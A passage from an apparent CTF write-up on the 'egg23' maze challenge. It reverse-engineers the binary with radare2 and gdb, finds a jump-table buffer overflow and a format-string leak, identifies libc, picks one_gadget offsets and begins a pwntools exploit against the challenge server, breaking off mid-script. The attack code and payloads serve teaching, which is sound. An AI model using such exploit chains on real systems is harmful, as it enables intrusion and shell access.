0x00401d0c      488b55e0       mov rdx, qword &#x5B;rbp - 0x20]\n       :    0x00401d10      488b45e8       mov rax, qword &#x5B;rbp - 0x18]\n       :    0x00401d14      be00040000     mov esi, 0x400              ; 1024\n       :    0x00401d19      4889c7         mov rdi, rax\n       :    0x00401d1c      e89fecffff     call sym.imp.fgets\n       :    0x00401d21      4885c0         test rax, rax\n       `==&lt; 0x00401d24      75d0           jne 0x401cf6\n            0x00401d26      488b45e0       mov rax, qword &#x5B;rbp - 0x20]\n            0x00401d2a      4889c7         mov rdi, rax\n            0x00401d2d      e80eecffff     call sym.imp.fclose\n            0x00401d32      bf20254000     mov edi, str.Press_enter_to_return_to_the_menue ; 0x402520 ; &quot;Press enter to return to the menue&quot;\n            0x00401d37      b800000000     mov eax, 0\n            0x00401d3c      e82fecffff     call sym.imp.printf\n            0x00401d41      488b05581420.  mov rax, qword &#x5B;obj.stdout] ; &#x5B;0x6031a0:8]=0\n            0x00401d48      4889c7         mov rdi, rax\n<\/pre><\/div>\n<br\/>As we can see from the above output, a file called <code>egg.txt<\/code> is opened after printing the congratulation message (<code>puts<\/code>). Within a loop <code>0x400<\/code> bytes at a time are read from the file (<code>fgets<\/code>). If the <code>fgets<\/code> call succeeded, a call to <code>printf<\/code> is made. The first parameter passed in <code>edi<\/code> contains the format string stored at <code>0x40251c<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n\n&#x5B;0x00400a60]&gt; ps @ 0x40251c\n%s\n<\/pre><\/div>\n<br\/>&#8230; which simply outputs a string. This string is the second argument passed in <code>rsi<\/code>, which contains the address of the bytes formerly read by <code>fgets<\/code>. Summing it up this part of the code prints a congratulation message followed by the content of the file <code>egg.txt<\/code> (stored on the server).\n<br\/>\n<br\/>Based on the other strings we have found, the assumption that we need to find the key and open the chest in order to reach this code is self-evident.\n<br\/>\n<br\/>In order to find the key, we have to walk through the maze searching for it. I started by implementing a simple <a href=\"https:\/\/en.wikipedia.org\/wiki\/Maze_solving_algorithm#Wall_follower\" target=\"_new\" rel=\"noopener noreferrer\">wall follower<\/a> python script:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; title: ; notranslate\" title=\"\">\n#!\/usr\/bin\/env python\n\nfrom pwn import *\nimport sys\nimport time\n\ndef getCmd(n):\n  if   (n == 0): return &#039;go north&#039;\n  elif (n == 1): return &#039;go west&#039;\n  elif (n == 2): return &#039;go south&#039;\n  elif (n == 3): return &#039;go east&#039;\n\np = process(&#039;.\/maze&#039;)\np.sendlineafter(&#039;&gt;&#039;, &#039;scryh&#039;) # name\np.sendlineafter(&#039;&gt;&#039;, &#039;3&#039;)     # play\np.recvuntil(&#039;&gt;&#039;)\n\nheading = 0 # 0=north, 1=west, 2=south, 3=east\ncur = heading\nkey = &#039;&#039;\n\nwhile True:\n  time.sleep(0.1) # for demonstration purpose\n  p.sendline(getCmd(cur))\n  ret = p.recvuntil(&#039;&gt;&#039;)\n  print(ret)\n  print(getCmd(cur))\n  if (&#039;There is a wall!&#039; in ret):\n    if (cur == heading): heading = (heading - 1 ) % 4\n    cur = heading\n  else:\n    heading = cur\n    cur = (heading + 1) % 4\n\n<\/pre><\/div>\n<br\/>The script follows the wall on the left-hand side:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg23_01.gif\" \/>\n<br\/>\n<br\/>Now we need to add some code within the loop to search for the key and open the locked chest:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; gutter: false; title: ; notranslate\" title=\"\">\n  ...\n  p.sendline(&#039;search&#039;) # search for key \/ chest\n  ret = p.recvuntil(&#039;&gt;&#039;)\n  if (&#039;You found a key!&#039; in ret):\n    p.sendline(&#039;pick up&#039;)\n    p.recvuntil(&#039;You pick up the key: &#039;)\n    key = p.recv(32)\n    p.recvuntil(&#039;&gt;&#039;)\n  if (&#039;You found a locked chest!&#039; in ret and key != &#039;&#039;):\n    p.sendline(&#039;open&#039;)\n    p.recvuntil(&#039;The chest is locked. Please enter the key:\\n&gt; &#039;)\n    p.sendline(key)\n    p.interactive()\n<\/pre><\/div>\n<br\/>In order to run the script on the server the following line:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; gutter: false; title: ; notranslate\" title=\"\">\np = process(&#039;.\/maze&#039;)\n<\/pre><\/div>\n<br\/>&#8230; needs to be replaced:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; gutter: false; title: ; notranslate\" title=\"\">\np = remote(&#039;whale.hacking-lab.com&#039;, 7331)\n<\/pre><\/div>\n<br\/>After running the script, we only have to wait until the key is found and the chest can be opened:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nCongratulation, you solved the maze. Here is your reward:\n                 *****\n              ****   ****\n            ***         ***\n          ***             ***\n        ***                 ***\n      ***     ****   ****     ***\n     **      ** *** **  **      **\n    **           **   ***.       **\n   **         .***  **  **        **\n  **         ******  ****          **\n **                                 **\n**        +-----------------+        **\n*         | +--+ *  *  +--+ |         *\n*         | |  |  ** * |  | |         *\n*         | +--+ ** ** +--+ |         *\n*         |  * **  ** *** * |         *\n*         | * *  ** *** * * |         *\n**        | +--+ * *  &#x5B;] *  |        **\n *        | |  |  *** ** ** |        *\n **       | +--+ ** *** **  |       **\n  **      +-----------------+      **\n   **                             **\n    ***                         ***\n      ***                     ***\n        ****               ****\n           *****       *****\n               *********\nPress enter to return to the menue\n<\/pre><\/div>\n<br\/>Great! We have got the content of the <code>egg.txt<\/code>. Hm, but wait &#8230; what is this? For an actual QR code there are far too less pixel.\n<br\/>\n<br\/>Trying to turn the ASCII QR code in some useful information did not succeed and until now the challenge felt far too easy for a hard challenge. I also wondered why the binary is provided, since we don&#8217;t really need it to implement a wall follower script like the above. Thus there must be more relating the binary.\n<br\/>\n<br\/><h3 style=\"margin-bottom:-5px\">Vulnerability 1: Buffer overflow<\/h3>\n<br\/>When analyzing the binary with <code>r2<\/code>, I noticed that the functions of the different menu entries (<code>[1] Change User<\/code>, <code>[2] Help<\/code>, &#8230;) are called through a jump table:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; highlight: [14,17]; title: ; notranslate\" title=\"\">\n&#x5B;0x00400a60]&gt; pdf @ main\n\/ (fcn) main 318\n|   main ();\n|           ; var int local_14h @ rbp-0x14\n|           ; var int local_10h @ rbp-0x10\n|           ; var unsigned int local_1h @ rbp-0x1\n|           ; DATA XREF from entry0 (0x400a7d)\n|           0x00401e7a      55             push rbp\n|           0x00401e7b      4889e5         mov rbp, rsp\n|           0x00401e7e      4883ec20       sub rsp, 0x20\n...\n|     |`--&gt; 0x00401f95      8b45ec         mov eax, dword &#x5B;local_14h]\n|     | :   0x00401f98      89c0           mov eax, eax\n|     | :   0x00401f9a      488b04c56031.  mov rax, qword &#x5B;rax*8 + sym.error] ; &#x5B;0x603160:8]=0x400bba sym.error\n|     | :   0x00401fa2      488945f0       mov qword &#x5B;local_10h], rax\n|     | :   0x00401fa6      488b45f0       mov rax, qword &#x5B;local_10h]\n|     | :   0x00401faa      ffd0           call rax\n|     | :   ; CODE XREF from main (0x401f93)\n|     `---&gt; 0x00401fac      c745ec000000.  mov dword &#x5B;local_14h], 0\n\\       `=&lt; 0x00401fb3      e9f2feffff     jmp 0x401eaa\n\n<\/pre><\/div>\n<br\/>The user input (the number of the menu entry) is stored at <code>[local_14h]<\/code>. This number is multiplied by 8 (64-bit addresses) and added to the address of the jump-table (<code>0x603160<\/code>), which contains five function addresses:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n&#x5B;0x00400a60]&gt; pxq @ 0x603160\n0x00603160  0x0000000000400bba  0x0000000000400bde   ..@.......@.....\n0x00603170  0x00000000004010e3  0x0000000000401656   ..@.....V.@.....\n0x00603180  0x0000000000401e44  0x0000000000000000   D.@.............\n\n<\/pre><\/div>\n<br\/>Depending on the entered number, the corresponding function is called.\n<br\/>\n<br\/>My first hope was that there might be a lacking or insufficient boundary check for the number to be entered, which would enable us to call address outside of the jump-table, but this was not the case.\n<br\/>\n<br\/>Thus we need to keep analyzing the binary. Especially interesting are functions like <code>fgets<\/code>, which actually read data from the user. We can list all function calls to <code>fgets<\/code> by using the <code>axt<\/code> command again:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n&#x5B;0x00400a60]&gt; axt @ sym.imp.fgets\nsub.e_H_e_J_bde 0x400c27 &#x5B;CALL] call sym.imp.fgets\n(nofunc) 0x401758 &#x5B;CALL] call sym.imp.fgets\n(nofunc) 0x401c4e &#x5B;CALL] call sym.imp.fgets\n(nofunc) 0x401d1c &#x5B;CALL] call sym.imp.fgets\n\n<\/pre><\/div>\n<br\/>By disassembling the code before the actual call, we can determine which parameters are passed to the function. The third call at <code>0x401c4e<\/code> looks interesting:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; highlight: [1,7,15,16,17]; title: ; notranslate\" title=\"\">\n&#x5B;0x00400a60]&gt; pd 15 @ 0x401c4e - 60\n            0x00401c12      f4             hlt\n            0x00401c13      0300           add eax, dword &#x5B;rax]\n            0x00401c15      0000           add byte &#x5B;rax], al\n        ,=&lt; 0x00401c17      e985010000     jmp 0x401da1\n        |   ; CODE XREF from sub.e_0_0HYour_position:_61e (+0x78e)\n        |   0x00401c1c      bf80244000     mov edi, str.The_chest_is_locked._Please_enter_the_key: ; 0x402480 ; &quot;The chest is locked. Please enter the key:\\n&gt; &quot;\n        |   0x00401c21      b800000000     mov eax, 0\n        |   0x00401c26      e845edffff     call sym.imp.printf\n        |   0x00401c2b      488b056e1520.  mov rax, qword &#x5B;obj.stdout] ; &#x5B;0x6031a0:8]=0\n        |   0x00401c32      4889c7         mov rdi, rax\n        |   0x00401c35      e8b6edffff     call sym.imp.fflush\n        |   0x00401c3a      488b05671520.  mov rax, qword &#x5B;obj.stdin]  ; &#x5B;0x6031a8:8]=0\n        |   0x00401c41      4889c2         mov rdx, rax\n        |   0x00401c44      be28000000     mov esi, 0x28               ; &#039;(&#039; ; 40\n        |   0x00401c49      bf40316000     mov edi, 0x603140           ; &#039;@1`&#039; ; &quot;\\n&quot;\n        |   0x00401c4e      e86dedffff     call sym.imp.fgets\n\n<\/pre><\/div>\n<br\/>This part of the code reads the key after the chest is opened. But notice the parameters to <code>fgets<\/code>: up to <code>0x28<\/code> are read to the address <code>0x603140<\/code>. Remember that the jump-table is located at <code>0x603160<\/code>? This means that the last 8 bytes of the data read from <code>fgets<\/code> will actually overflow the jump-table (overwriting the first address)!\n<br\/>\n<br\/>In order to verify this, I added another 8 byte to the key (key-length: <code>32<\/code> byte = <code>0x20<\/code> byte):\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; gutter: false; highlight: [3]; title: ; notranslate\" title=\"\">\n    ...\n    p.recvuntil(&#039;The chest is locked. Please enter the key:\\n&gt; &#039;)\n    p.sendline(key + &#039;A&#039;*8) # added 8 byte\n    p.interactive()\n\n<\/pre><\/div>\n<br\/>&#8230; and reran the script locally. After the congratulation message is displayed, we can verify the overflow by viewing the memory with <code>gdb<\/code> (I use <a href=\"https:\/\/github.com\/longld\/peda\" target=\"_new\" rel=\"noopener noreferrer\">gdb-peda<\/a>):\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg23# gdb .\/maze $(pidof maze)\nReading symbols from .\/maze...(no debugging symbols found)...done.\nAttaching to program: \/root\/Documents\/he19\/egg23\/maze, process 8582\n...\ngdb-peda$ x\/6xg 0x603160\n0x603160:\t0x0041414141414141\t0x0000000000400bde\n0x603170:\t0x00000000004010e3\t0x0000000000401656\n0x603180:\t0x0000000000401e44\t0x0000000000000000\n<\/pre><\/div>\n<br\/>The first address of the jump-table has been overwritten with the value <code>0x0041414141414141<\/code>. We can trigger a call to this function by entering <code>0<\/code> in the main menu:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; highlight: [2,24,41]; title: ; notranslate\" title=\"\">\n&#x5B;----------------------------------registers-----------------------------------]\nRAX: 0x41414141414141 (&#039;AAAAAAA&#039;)\nRBX: 0x0\nRCX: 0x7f3c7f25a804 (&lt;write+20&gt;:\tcmp    rax,0xfffffffffffff000)\nRDX: 0x0\nRSI: 0x7f3c7f32d8c0 --&gt; 0x0\nRDI: 0x0\nRBP: 0x7ffec3f673a0 --&gt; 0x401fc0 (push   r15)\nRSP: 0x7ffec3f67380 --&gt; 0x401fc0 (push   r15)\nRIP: 0x401faa (call   rax)\nR8 : 0x7f3c7f32d8c0 --&gt; 0x0\nR9 : 0x7f3c7f332500 (0x00007f3c7f332500)\nR10: 0x7f3c7f2dbae0 --&gt; 0x100000000\nR11: 0x246\nR12: 0x400a60 (xor    ebp,ebp)\nR13: 0x7ffec3f67480 --&gt; 0x1\nR14: 0x0\nR15: 0x0\nEFLAGS: 0x10297 (CARRY PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)\n&#x5B;-------------------------------------code-------------------------------------]\n   0x401f9a:\tmov    rax,QWORD PTR &#x5B;rax*8+0x603160]\n   0x401fa2:\tmov    QWORD PTR &#x5B;rbp-0x10],rax\n   0x401fa6:\tmov    rax,QWORD PTR &#x5B;rbp-0x10]\n=&gt; 0x401faa:\tcall   rax\n   0x401fac:\tmov    DWORD PTR &#x5B;rbp-0x14],0x0\n   0x401fb3:\tjmp    0x401eaa\n   0x401fb8:\tnop    DWORD PTR &#x5B;rax+rax*1+0x0]\n   0x401fc0:\tpush   r15\nNo argument\n&#x5B;------------------------------------stack-------------------------------------]\n0000| 0x7ffec3f67380 --&gt; 0x401fc0 (push   r15)\n0008| 0x7ffec3f67388 --&gt; 0x400a60 (xor    ebp,ebp)\n0016| 0x7ffec3f67390 --&gt; 0x41414141414141 (&#039;AAAAAAA&#039;)\n0024| 0x7ffec3f67398 --&gt; 0xa00000000000000 (&#039;&#039;)\n0032| 0x7ffec3f673a0 --&gt; 0x401fc0 (push   r15)\n0040| 0x7ffec3f673a8 --&gt; 0x7f3c7f19409b (&lt;__libc_start_main+235&gt;:\tmov    edi,eax)\n0048| 0x7ffec3f673b0 --&gt; 0x0\n0056| 0x7ffec3f673b8 --&gt; 0x7ffec3f67488 --&gt; 0x7ffec3f6854c --&gt; 0x4700657a616d2f2e (&#039;.\/maze&#039;)\n&#x5B;------------------------------------------------------------------------------]\nLegend: code, data, rodata, value\nStopped reason: SIGSEGV\n0x0000000000401faa in ?? ()\n<\/pre><\/div>\n<br\/>The program raises a segmentation fault, since <code>rax<\/code> contains <code>0x41414141414141<\/code>. Thus we successfully control the instruction pointer.\n<br\/>\n<br\/>Since <i>NX<\/i> is enabled and the server is probably running <i>ASLR<\/i>, it is quite challenging to determine an address we could jump to. Luckily another vulnerability comes in handy here.\n<br\/>\n<br\/><h3 style=\"margin-bottom:-5px\">Vulnerability 2: Format String<\/h3>\n<br\/>When running the program, the first thing the user is supposed to do is entering his name. This felt quite strange, because the name did not seem to be used anywhere. Though, I could not spot an overflow vulnerability, where the name is read.\n<br\/>\n<br\/>What also felt quite strange is the fact that the entered commands (e.g. <code>go south<\/code>) are XORed with <code>0x42<\/code> before being compared.\n<br\/>\n<br\/>Along with <code>r2<\/code> I usually use <a href=\"https:\/\/www.nsa.gov\/resources\/everyone\/ghidra\/\" target=\"_new\" rel=\"noopener noreferrer\">ghidra<\/a> to keep track of the decompiled C source code. When browsing the C source code, the following part caught my attention:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg23_02.png\" \/>\n<br\/>\n<br\/>The XORed string being compared here is (<code>'5*-#\/+HB'<\/code>), which actually is the command &#8230;\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n\nroot@kali:~\/Documents\/he19\/egg23# python\n&gt;&gt;&gt; s = &#039;5*-#\/+HB&#039;\n&gt;&gt;&gt; r = &#039;&#039;\n&gt;&gt;&gt; for c in s:\n...   r+=chr(0x42^ord(c))\n...\n&gt;&gt;&gt; r\n&#039;whoami\\n\\x00&#039;\n<\/pre><\/div>&#8230; <code>whomai<\/code>.\n<br\/>\n<br\/>And this command obviously outputs the entered username: <code>printf(&DAT_00603200)<\/code>. The username string is the first parameter to the call to <code>printf<\/code>, which is the format string to be used. Thus we have a classical format string vulnerability! Let&#8217;s quickly verify this by inserting format specifiers in the name:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg23# .\/maze\n<\/pre><\/div><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nPlease enter your name:\n&gt; %p.%p.%p\n\n<\/pre><\/div><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n\nChoose:\n&#x5B;1] Change User\n&#x5B;2] Help\n&#x5B;3] Play\n&#x5B;4] Exit\n&gt; 3\n\n<\/pre><\/div><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nYour position:\n\n   +-----+-----+\n               |\n               |\n               |\n   +-----+     +\n         |     |\n         |  X  |\n         |     |\n         +-----+\n\n\n\n\n\n\n\n\nEnter your command:\n&gt; whoami\n<\/pre><\/div><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nYour position:\n\n   +-----+-----+\n               |\n               |\n               |\n   +-----+     +\n         |     |\n         |  X  |\n         |     |\n         +-----+\n\n\n\n\n\n0x4025a7.0x4025af.0x7f87088a4804\n\n\nEnter your command:\n&gt;\n<\/pre><\/div>\n<br\/>It works! We successfully leaked three addresses using the format specifier <code>%p<\/code>.\n<br\/>\n<br\/><h3 style=\"margin-bottom:-5px\">Forging the final exploit<\/h3>\n<br\/>Summing it up, the two vulnerabilities enable use to:\n<br\/><ul style=\"margin-top:8px;margin-bottom:-15px\"><li>control the instruction pointer (buffer overflow)<\/li><li>leak register and stack values (format string vulnerability)<\/li><\/ul>\n<br\/>\n<br\/>Actually the format string vulnerability could also be used to control the instruction pointer, though it is far more easy to use the buffer overflow for this purpose and leverage the format string vulnerability to leak addresses only.\n<br\/>\n<br\/>As we have already pointed out, the binary is compiled with <i>NX<\/i> (we cannot directly executed shellcode on the stack or other writable segments) and <i>ASLR<\/i> is probably enabled on the server (we do not know address of e.g. the libc).\n<br\/>\n<br\/>Thus the attack plan looks like this:\n<br\/><ul style=\"margin-top:8px;margin-bottom:-15px\"><li>determine libc version on the sever by leaking a libc address (format string vulnerability)<\/li><li>calculate libc base address<\/li><li>calculate address of one gadget<\/li><li>overwrite jump-table with one gadget address (buffer overflow)<\/li><li>trigger one gadget by choosing <code>0<\/code> in the main menu<\/li><\/ul>\n<br\/>\n<br\/>In order to determine the libc version, we need to leak a libc address. For this purpose the format string vulnerability can be used. At first let&#8217;s set a breakpoint on the vulnerable <code>printf<\/code> call:\n<br\/>\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg23# gdb .\/maze\nReading symbols from .\/maze...(no debugging symbols found)...done.\ngdb-peda$ b *0x401e17\nBreakpoint 1 at 0x401e17\ngdb-peda$\n\n<\/pre><\/div>\n<br\/>Now we run the program (<code>r<\/code>), enter some name (e.g. <code>test<\/code>), choose <code>[3] Play<\/code> and enter the command <code>whoami<\/code> in order to hit the breakpoint:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n&#x5B;----------------------------------registers-----------------------------------]\nRAX: 0x0\nRBX: 0x0\nRCX: 0x7ffff7eca804 (&lt;write+20&gt;:\tcmp    rax,0xfffffffffffff000)\nRDX: 0x4025af --&gt; 0x5b1b002165794200\nRSI: 0x4025a7 (&quot;5*-#\/+HB&quot;)\nRDI: 0x6031f0 --&gt; 0x74736574 (&#039;test&#039;)\nRBP: 0x7fffffffe100 --&gt; 0x7fffffffe130 --&gt; 0x401fc0 (push   r15)\nRSP: 0x7fffffffe0d0 --&gt; 0x6031a0 --&gt; 0x7ffff7f9c760 --&gt; 0xfbad2a84\nRIP: 0x401e17 (call   0x400970 &lt;printf@plt&gt;)\nR8 : 0x7ffff7fa2500 (0x00007ffff7fa2500)\nR9 : 0x7ffff7fa2500 (0x00007ffff7fa2500)\nR10: 0x7ffff7fa2500 (0x00007ffff7fa2500)\nR11: 0x246\nR12: 0x400a60 (xor    ebp,ebp)\nR13: 0x7fffffffe210 --&gt; 0x1\nR14: 0x0\nR15: 0x0\nEFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)\n&#x5B;-------------------------------------code-------------------------------------]\n   0x401e0b:\tjne    0x401e1e\n   0x401e0d:\tmov    edi,0x6031f0\n   0x401e12:\tmov    eax,0x0\n=&gt; 0x401e17:\tcall   0x400970 &lt;printf@plt&gt;\n   0x401e1c:\tjmp    0x401e2e\n   0x401e1e:\tmov    eax,0x0\n   0x401e23:\tcall   0x400bba &lt;error&gt;\n   0x401e28:\tnop\nGuessed arguments:\narg&#x5B;0]: 0x6031f0 --&gt; 0x74736574 (&#039;test&#039;)\n&#x5B;------------------------------------stack-------------------------------------]\n0000| 0x7fffffffe0d0 --&gt; 0x6031a0 --&gt; 0x7ffff7f9c760 --&gt; 0xfbad2a84\n0008| 0x7fffffffe0d8 --&gt; 0x7ffff7f9c760 --&gt; 0xfbad2a84\n0016| 0x7fffffffe0e0 --&gt; 0x7ffff7f982a0 --&gt; 0x0\n0024| 0x7fffffffe0e8 --&gt; 0x7ffff7e4ff9d (&lt;fflush+157&gt;:\txor    edx,edx)\n0032| 0x7fffffffe0f0 --&gt; 0x0\n0040| 0x7fffffffe0f8 --&gt; 0x15f00000000\n0048| 0x7fffffffe100 --&gt; 0x7fffffffe130 --&gt; 0x401fc0 (push   r15)\n0056| 0x7fffffffe108 --&gt; 0x401fac (mov    DWORD PTR &#x5B;rbp-0x14],0x0)\n&#x5B;------------------------------------------------------------------------------]\nLegend: code, data, rodata, value\n\nBreakpoint 1, 0x0000000000401e17 in ?? ()\ngdb-peda$\n\n<\/pre><\/div>\n<br\/>The first argument to the <code>printf<\/code> call is passed in <code>RDI<\/code>. This is the name we entered, which is used as the format string (in this case <code>\"test\"<\/code>). Leveraging this we can leak all following arguments, which are passed in the following order:\n<br\/><ul style=\"margin-top:8px;margin-bottom:-15px\"><li>RSI<\/li><li>RDX<\/li><li>RCX<\/li><li>R8<\/li><li>R9<\/li><li>Stack &#8230;<\/li><\/ul>\n<br\/>\n<br\/>This means that we can print the value of <code>RSI<\/code> by inserting the format specifier <code>%1$p<\/code>, <code>RDX<\/code> with <code>%2$p<\/code>, <code>RCX<\/code> with <code>%3$p<\/code> and so forth. The first item on the stack can thus be leaked with the format specifier <code>%6$p<\/code>.\n<br\/>\n<br\/>Viewing the stack we can see that the second item on the stack is actually a libc address of the symbol <code>_IO_2_1_stdout_<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\ngdb-peda$ x\/xg 0x7ffff7f9c760\n0x7ffff7f9c760 &lt;_IO_2_1_stdout_&gt;:\t0x00000000fbad2a84\n\n<\/pre><\/div>\n<br\/>In order to leak this address we need to insert the format specifier <code>%7$p<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg23# .\/maze \n<\/pre><\/div><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nPlease enter your name:\n&gt; %7$p\n<\/pre><\/div><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nChoose:\n&#x5B;1] Change User\n&#x5B;2] Help\n&#x5B;3] Play\n&#x5B;4] Exit\n&gt; 3\n<\/pre><\/div><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nYour position:\n\n   +     +\n   |     |\n   |     |\n   |     |\n   +     +-----+\n   |           |\n   |        X  |\n   |           |\n   +-----+-----+\n\n\n\n\n\n\n\n\nEnter your command:\n&gt; whoami\n<\/pre><\/div><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nYour position:\n\n   +     +\n   |     |\n   |     |\n   |     |\n   +     +-----+\n   |           |\n   |        X  |\n   |           |\n   +-----+-----+\n\n\n\n\n\n0x7f730e1b8760\n\n\nEnter your command:\n&gt;\n<\/pre><\/div>\n<br\/>Since the stack position of this address on the server may vary, we need to verify this. I tried different offsets and used the <a href=\"https:\/\/libc.blukat.me\/\" target=\"_new\" rel=\"noopener noreferrer\">libc database search<\/a> to verify if the leaked address may be the symbol <code>_IO_2_1_stdout_<\/code>. Using the format specifier <code>%10$p<\/code> succeeded:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg23# nc whale.hacking-lab.com 7331\n<\/pre><\/div><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nPlease enter your name:\n&gt; %10$p\n<\/pre><\/div><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nChoose:\n&#x5B;1] Change User\n&#x5B;2] Help\n&#x5B;3] Play\n&#x5B;4] Exit\n&gt; 3\n<\/pre><\/div><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nYour position:\n\n               +     +\n               |     |\n               |     |\n               |     |\n         +-----+     +\n         |           |\n         |  X        |\n         |           |\n         +-----+-----+\n\n\n\n\n\n\n\n\nEnter your command:\n&gt; whoami\n<\/pre><\/div><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nYour position:\n\n               +     +\n               |     |\n               |     |\n               |     |\n         +-----+     +\n         |           |\n         |  X        |\n         |           |\n         +-----+-----+\n\n\n\n\n\n0x7f5823580620\n\n\nEnter your command:\n&gt; \n<\/pre><\/div>\n<br\/>The leaked address of the server is <code>0x7f5823580620<\/code>. Using the <a href=\"https:\/\/libc.blukat.me\/\" target=\"_new\" rel=\"noopener noreferrer\">libc database search<\/a> we can determine that there are six possible libc versions:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg23_03.png\" width=\"800\"\/>\n<br\/>\n<br\/>The first three are <code>i386<\/code> libc versions. Since this is a 64-bit binary, we can omit these and only have to focus on the three <code>x64<\/code> versions.\n<br\/>\n<br\/>In order to determine the address of all one gadgets within these libc versions, we start by downloading them from the database:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg23_04.png\" width=\"800\"\/>\n<br\/>\n<br\/>Now we can use the <a href=\"https:\/\/github.com\/david942j\/one_gadget\" target=\"_new\" rel=\"noopener noreferrer\">one_gadget tool<\/a> in order to determine the offsets of all one gadgets:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg23\/libc# one_gadget libc6_2.23-0ubuntu10_amd64.so\n0x45216 execve(&quot;\/bin\/sh&quot;, rsp+0x30, environ)\nconstraints:\n  rax == NULL\n\n0x4526a execve(&quot;\/bin\/sh&quot;, rsp+0x30, environ)\nconstraints:\n  &#x5B;rsp+0x30] == NULL\n\n0xf02a4 execve(&quot;\/bin\/sh&quot;, rsp+0x50, environ)\nconstraints:\n  &#x5B;rsp+0x50] == NULL\n\n0xf1147 execve(&quot;\/bin\/sh&quot;, rsp+0x70, environ)\nconstraints:\n  &#x5B;rsp+0x70] == NULL\n<\/pre><\/div>\n<br\/>Finally we can leverage the buffer overflow to try the different libc versions and one gadgets. In order to do this, we need to make a few adjustments to our former script:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; title: ; notranslate\" title=\"\">\n#!\/usr\/bin\/env python\n\nfrom pwn import *\nimport sys\nimport re\n\n# libc6_2.23-0ubuntu10_amd64.so\nstdout_offset = 0x3c5620\noneg1 = 0x45216\noneg2 = 0x4526a # working !\noneg3 = 0xf02a4\noneg4 = 0xf1147\n\n\ndef getCmd(n):\n  if   (n == 0): return &#039;go north&#039;\n  elif (n == 1): return &#039;go west&#039;\n  elif (n == 2): return &#039;go south&#039;\n  elif (n == 3): return &#039;go east&#039;\n\np = remote(&#039;whale.hacking-lab.com&#039;, 7331)\np.sendlineafter(&#039;&gt;&#039;, 